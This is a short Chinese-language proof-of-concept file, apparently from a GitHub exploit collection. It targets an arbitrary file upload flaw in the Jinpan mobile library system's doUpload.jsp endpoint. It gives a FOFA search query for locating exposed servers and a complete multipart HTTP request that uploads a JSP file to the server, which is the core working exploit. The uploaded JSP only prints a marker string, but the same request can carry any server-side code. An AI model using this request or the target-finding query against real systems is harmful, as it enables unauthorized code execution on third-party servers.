POC00/金盘移动图书馆系统存在任意文件上传漏洞.md

28 lines
890 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 金盘移动图书馆系统存在任意文件上传漏洞
金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞攻击者通过漏洞可以获取权限。
## fofa
```
app="金盘软件-金盘移动图书馆系统"
```
## poc
```
POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=399e563f0389566bd40fd4d6409a67dd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 179
Connection: close
--399e563f0389566bd40fd4d6409a67dd
Content-Disposition: form-data; name="file"; filename="jILUp0.jsp.jsp"
<% out.println("lP4pC7HrY"); %>
--399e563f0389566bd40fd4d6409a67dd--
```
![image](https://github.com/wy876/POC/assets/139549762/17f45fd2-35a6-474a-b2ee-c6f49426423a)